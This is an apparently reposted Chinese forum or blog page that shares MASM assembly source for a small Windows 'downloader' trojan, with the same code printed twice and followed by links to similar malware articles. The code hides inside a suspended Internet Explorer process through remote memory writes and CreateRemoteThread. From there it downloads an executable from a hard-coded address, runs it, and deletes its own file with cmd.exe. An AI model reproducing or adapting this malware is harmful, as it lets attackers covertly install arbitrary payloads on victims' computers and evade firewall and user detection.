无DLL,插IE下载者 3.5K
来源:互联网 发布:淘宝旗舰店和天猫店 编辑:程序博客网 时间:2024/05/15 05:01
无DLL,插IE下载者 3.5K (转) [ 日期: 2006-05-17 01:11 | 作者: d99 | 来自: 转 | | ] //好多兄弟都找我要这个,我就把源码帖在这里把
.386
.model flat,stdcall
option casemap:none
include windows.inc
include urlmon.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib urlmon.lib
includelib kernel32.lib
Download proto
.data
szUrlmon db "urlmon.dll",0
szURL db "http://192.168.1.5/123.exe",24 dup (0)
szFile db "c:/test.exe",39 dup (0)
szCmdline db "c:/program files/internet explorer/iexplore.exe",0
szAdd db '/cmd.exe /c del "',0
quote db '"',0
.data?
cbSize DWORD ?
cdWritten DWORD ?
pid DWORD ?
hProcess DWORD ?
hModule DWORD ?
hThread DWORD ?
startupinfo STARTUPINFO <?>
pi PROCESS_INFORMATION <>
SelfPath db MAX_PATH dup (?)
szCmd db MAX_PATH dup (?)
.code
start:
invoke GetModuleHandle,0
mov hModule,eax
mov edi,eax
assume edi:ptr IMAGE_DOS_HEADER
add edi,[edi].e_lfanew
add edi,sizeof DWORD
assume edi:ptr IMAGE_FILE_HEADER
add edi,sizeof IMAGE_FILE_HEADER
assume edi:ptr IMAGE_OPTIONAL_HEADER32
mov eax,[edi].SizeOfImage
mov cbSize,eax
lea esi,offset startupinfo
assume esi:ptr STARTUPINFO
mov [esi].cb,sizeof STARTUPINFO
invoke GetStartupInfo,offset startupinfo
mov [esi].wShowWindow,SW_HIDE
mov [esi].dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
invoke createProcess,offset
szCmdline,NULL,NULL,NULL,FALSE,create_SUSPENDED,NULL,NULL,offset startupinfo,offset pi
lea esi,offset pi
assume esi:ptr PROCESS_INFORMATION
mov eax,[esi].dwProcessId
mov pid,eax
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid
mov hProcess,eax
invoke VirtualAllocEx,hProcess,hModule,cbSize,MEM_COMMIT or
MEM_RESERVE,PAGE_EXECUTE_READWRITE
invoke WriteProcessMemory,hProcess,eax,hModule,cbSize,offset cdWritten
invoke createRemoteThread,hProcess,0,0,addr Download,hModule,0,ebx
mov hThread,eax
invoke WaitForSingleObject,hThread,INFINITE
invoke CloseHandle,hThread
invoke CloseHandle,hProcess
deleteSelf:
invoke GetModuleFileName,NULL,offset SelfPath,MAX_PATH
invoke GetSystemDirectory,offset szCmd,MAX_PATH
invoke lstrcat,offset szCmd,offset szAdd
invoke lstrcat,offset szCmd,offset SelfPath
invoke lstrcat,offset szCmd,offset quote
invoke Sleep,200
invoke WinExec,offset szCmd,SW_HIDE
invoke ExitProcess,0
Download proc
invoke LoadLibrary,offset szUrlmon
invoke URLDownloadToFile,NULL,offset szURL,offset szFile,0,NULL
invoke WinExec,offset szFile,SW_SHOW
invoke ExitThread,0
Download endp
end start
.386
.model flat,stdcall
option casemap:none
include windows.inc
include urlmon.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib urlmon.lib
includelib kernel32.lib
Download proto
.data
szUrlmon db "urlmon.dll",0
szURL db "http://192.168.1.5/123.exe",24 dup (0)
szFile db "c:/test.exe",39 dup (0)
szCmdline db "c:/program files/internet explorer/iexplore.exe",0
szAdd db '/cmd.exe /c del "',0
quote db '"',0
.data?
cbSize DWORD ?
cdWritten DWORD ?
pid DWORD ?
hProcess DWORD ?
hModule DWORD ?
hThread DWORD ?
startupinfo STARTUPINFO <?>
pi PROCESS_INFORMATION <>
SelfPath db MAX_PATH dup (?)
szCmd db MAX_PATH dup (?)
.code
start:
invoke GetModuleHandle,0
mov hModule,eax
mov edi,eax
assume edi:ptr IMAGE_DOS_HEADER
add edi,[edi].e_lfanew
add edi,sizeof DWORD
assume edi:ptr IMAGE_FILE_HEADER
add edi,sizeof IMAGE_FILE_HEADER
assume edi:ptr IMAGE_OPTIONAL_HEADER32
mov eax,[edi].SizeOfImage
mov cbSize,eax
lea esi,offset startupinfo
assume esi:ptr STARTUPINFO
mov [esi].cb,sizeof STARTUPINFO
invoke GetStartupInfo,offset startupinfo
mov [esi].wShowWindow,SW_HIDE
mov [esi].dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
invoke createProcess,offset
szCmdline,NULL,NULL,NULL,FALSE,create_SUSPENDED,NULL,NULL,offset startupinfo,offset pi
lea esi,offset pi
assume esi:ptr PROCESS_INFORMATION
mov eax,[esi].dwProcessId
mov pid,eax
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid
mov hProcess,eax
invoke VirtualAllocEx,hProcess,hModule,cbSize,MEM_COMMIT or
MEM_RESERVE,PAGE_EXECUTE_READWRITE
invoke WriteProcessMemory,hProcess,eax,hModule,cbSize,offset cdWritten
invoke createRemoteThread,hProcess,0,0,addr Download,hModule,0,ebx
mov hThread,eax
invoke WaitForSingleObject,hThread,INFINITE
invoke CloseHandle,hThread
invoke CloseHandle,hProcess
deleteSelf:
invoke GetModuleFileName,NULL,offset SelfPath,MAX_PATH
invoke GetSystemDirectory,offset szCmd,MAX_PATH
invoke lstrcat,offset szCmd,offset szAdd
invoke lstrcat,offset szCmd,offset SelfPath
invoke lstrcat,offset szCmd,offset quote
invoke Sleep,200
invoke WinExec,offset szCmd,SW_HIDE
invoke ExitProcess,0
Download proc
invoke LoadLibrary,offset szUrlmon
invoke URLDownloadToFile,NULL,offset szURL,offset szFile,0,NULL
invoke WinExec,offset szFile,SW_SHOW
invoke ExitThread,0
Download endp
end start
- 无DLL,插IE下载者 3.5K
- 无DLL 穿防火墙下载者
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- Delphi编写无DLL版穿墙的下载者
- 无dll插入进程,下载者vc源代码
- ring0 APC插dll
- dll下载者~~
- 插APC实现DLL注入
- Java 下载者 IE & FF
- 3K下载者.txt
- VC无进程木马下载器源码(利用IE隐藏进程)
- EasyUI 使用form方式提交表单,返回结果时,IE提示下载(火狐无问题)
- VC无进程木马下载器源码(利用IE隐藏进程)
- 解决微软Edge浏览器和IE浏览器下载无反应的问题
- 无dll无进程木马
- IE编程---DLL绑定
- IE编程---DLL绑定
- 使用JS获取URL的参数(一)
- 役物
- 最详细的SQL注入相关的命令整理
- 咏墨
- SA权限仅需xp_regwrite即可有dos shell
- 无DLL,插IE下载者 3.5K
- 月亮和武打小说
- 对抗杀毒软件的内存扫描
- 1k(程序体积1kb) 反向连接,零管道后门
- 点击一个页面的链接后,刚开始会正常显示。几分钟后就会报出空指针异常,异常代码如下:
- sqlserver操作练习笔记
- 利用ASP远程注册DLL的方法
- Joel的比尔盖茨评审回忆
- 如何快速判断你的网段内谁的网卡处在混杂模式